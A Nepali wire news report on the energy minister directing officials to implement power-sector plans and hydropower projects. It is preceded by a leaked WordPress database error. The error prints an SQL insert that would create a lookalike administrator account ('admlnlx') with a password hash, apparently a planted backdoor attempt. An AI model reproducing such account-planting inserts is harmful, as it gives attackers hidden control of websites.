WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfGOkqL9uT9yENAaljmr5zs7AyBU4w.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 08:05:13', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस ११–
ऊर्जामन्त्री जनार्दन शर्माले ऊर्जा क्षेत्रको विकासका लागि तय गरिएका कार्ययोजनाको शतप्रतिशत कार्यान्वयनका लागि दिनरात नभनी काम गर्न मन्त्रालय र मातहतका विभागीय प्रमुखलाई निर्देशन दिनुभएको छ ।
मन्त्रालयमा आज आयोजित ‘चालु आवको आयोजनाको पहिलो चौमासिक प्रगति समीक्षा एवम् समाधानका उपाय’ विषयको कार्यक्रममा उहाँले निर्माणाधीन आयोजनाको कार्यप्रगति बढाउन र समस्या देखिएका क्षेत्रमा विशेष ध्यान दिन सम्बन्धीत सबै पक्षसंग आग्रह गर्नुभयो ।
मन्त्री शर्माले सरकारको प्रमुख लक्ष्यका रुपमा रहेको विद्युत्भार कटौतीमुक्त अभियानलाई विशेष प्राथमिकतामा राख्न र सोहीअनुसार अगाडि बढेको कार्ययोजनालाई अक्षरशः कार्यान्वयन गर्न ध्यानाकर्षण गराउँदै ‘उज्यालो नेपाल’को सपना साकार पार्नका लागि कुनै पनि कमजोरी नगर्न विभागीय प्रमुखलाई निर्देशन दिनुभयो ।
सरकारले केही ठूला जलविद्युत् आयोजना अगाडि बढाउने सोच राखेको भन्दै उहाँले त्यसको आवश्यक भौतिक एवम् प्राविधिक तयारी तत्काल गर्नसमेत ध्यानाकर्षण गराउनुभयो ।
ऊर्जा मन्त्रालयका सचिव अनुपकुमार उपाध्यायले मन्त्रालय मातहत पहिलो प्राथमिकतामा ३२, दोस्रो प्राथमिकतामा तीन र तेस्रो प्राथमिकतामा दुई गरी कुल ३७ आयोजना सञ्चालनमा रहेको भन्दै राष्ट्रिय गौरवको आयोजनाका रुपमा रहेको माथिल्लो तामाकोसीको कार्यप्रगति उत्साहजनक रहेको बताउनुभयो ।
उहाँले सबै कर्मचारी तथा विभागीय प्रमुखलाई राष्ट्रिय आवश्यकताको ख्याल गरेर अगाडि बढ्न र कार्यसम्पादनमा कुनै पनि कसर बाँकी नराख्न आग्रह गर्नुभयो ।
सो अवसरमा नेपाल विद्युत् प्राधिकरण, विद्युत् विकास विभाग, बूढीगण्डकी जलविद्युत् आयोजना विकास समिति, जलविद्युत् लगानी तथा विकास कम्पनीलगायतका प्रमुख तथा प्रतिनिधिले आयोजनाको अवस्था र समस्याका बारेमा जानकारी गराउनुभएको थियो । –रासस